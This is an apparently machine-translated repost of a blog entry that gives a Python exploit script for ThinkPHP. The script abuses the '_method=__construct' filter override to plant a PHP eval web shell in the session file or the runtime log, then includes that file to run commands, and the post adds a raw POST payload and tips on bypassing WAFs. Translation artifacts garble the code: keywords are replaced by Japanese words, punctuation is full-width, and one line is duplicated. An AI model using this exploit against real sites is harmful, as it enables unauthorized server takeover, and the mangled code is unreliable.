thinkphp-getshellバイパス

その他 2020-04-17 01:04:01 訪問数: null

 

 

何年も前に書かれたテストでは、主にセッションのログを使用するgetshellまたはthinkphp //攻撃テストを使用しない 

インポートリクエスト
インポート時間
インポートsys 
def session_write(url):
    fuck = {'_method': '__construct'、 'filter []': 'think \ Session :: set'、 'method': 'get'、
            'get [] ': "<?php @eval($ _ POST [' x '])?>"、' server [] ':' 1 '} 
    res = requests.post(url、cookies = {' PHPSESSID ':' 9enl96jhqjhvuj37t0m6aluule '} 、data = fuck、headers = {'User-Agent': 'Mozilla / 5.0(Macintosh; BaiduSpider)'})
    fuckshell = {'_method': '__construct'、 'filter []': 'think \ __ include_file'、 'メソッド ':' get '、
            ' server [REQUEST_METHOD] ':' / tmp / sess_9enl96jhqjhvuj37t0m6aluule '、' x ':'print(2020202020); '} print(2020202020); '} 
    res = requests.post(url、cookies = {' PHPSESSID ':' 9enl96jhqjhvuj37t0m6aluule '}、data = fuckshell、
                        headers = {' User-Agent ':' Mozilla / 5.0(Macintosh; BaiduSpider) '})
    return res.text 

def log_shell(url): 
    day = '../data/runtime/log/'+time.strftime("%Y%m/%d.log " 、time.localtime())
    print day 
    fuck = {'_method': '__construct'、 'filter []': 'call_user_func'、 'method': 'get'、 'get []': "<?php @eval ($ _POST ['x'])?> "、 'server []': '1'} 
    res = requests.post(url、cookies = {'PHPSESSID': '9enl96jhqjhvuj37t0m6aluule'}、data = fuck、headers = { 'User-Agent': 'Mozilla / 5.0(Macintosh; BaiduSpider)'})
    fuckshell = {'_method': '__construct'、 'filter []': 'think \ __ include_file'、 'method': 'get'、
            'server [REQUEST_METHOD]':day、 'x': 'print(2020202020);'} 
    res = requests.post(url、cookies = {'PHPSESSID': '9enl96jhqjhvuj37t0m6aluule'}、data = fuckshell、} 
                        headers = {'User-Agent': 'Mozilla / 5.0(Macintosh; BaiduSpider)'})
sys.argv [1]の場合はres.textを
    返します:
    url = sys.argv [1] + 'index.php?s = captcha ' 
else: 
    exit( "exp.py http:// xxxx")
if '20202020' session_write(url):
    print "shell ok session shell" 
elif '20202020' in log_shell(url):
    print "shell ok log shell" 
else:
    print "bad"

使用する: 

 

 直接アドレスを入力し、キーを1つだけ...

 

ブログは主に個人的なメモを取ることです。   

 

接続方法:

 

 

 

 

 

 投稿データ

_method = __ construct&filter [] = think \ __ include_file&method = get&server [REQUEST_METHOD] = / tmp / sess_9enl96jhqjhvuj37t0m6aluule

  

 

利点:一部のwafをバイパスすると、文のペイロードを変更できます

   ルートディレクトリが書き込み可能でない場合は、含める方が便利です。

 

セッションのgetshellが失敗した場合は、thinkphpログを使用しようとします。これはエコーされ、テスト+変更するだけです。

おすすめ

転載: www.cnblogs.com/0xdd/p/12716972.html
おすすめ
ランキング
ルーター設定 DHCP
约束式编程学习笔记[5] local consistency (1) 剪定义域
Configuración de la nueva máquina Android
Androidプログラミング:デュプレックスtcpクライアントでのRxJavaのアプリケーション
SpringBoot プロジェクトが application.yml および application-prod.yml 構成ファイル内のポート、データベース リンク、その他の情報を変更した後、プロジェクトが突然実行に失敗します。
java之Set接口与实现类
Modbus ASCIIは、マルチマスター・アプリケーションを実現します
求二次方程根(c语言)
【バイバオシュ&Linux】WSL-WindowsでのLinuxインストールチュートリアル
Blue Bridge Cup 26 日目 (Python) 試験苦戦
アーカイブ
もっと
2024-06-06(0)
2024-06-05(0)
2024-06-04(0)
2024-06-03(1)
2024-06-02(0)
2024-06-01(1)
2024-05-31(1)
2024-05-30(0)
2024-05-29(1)
2024-05-28(0)

コードワールド

© 2018 codetd.com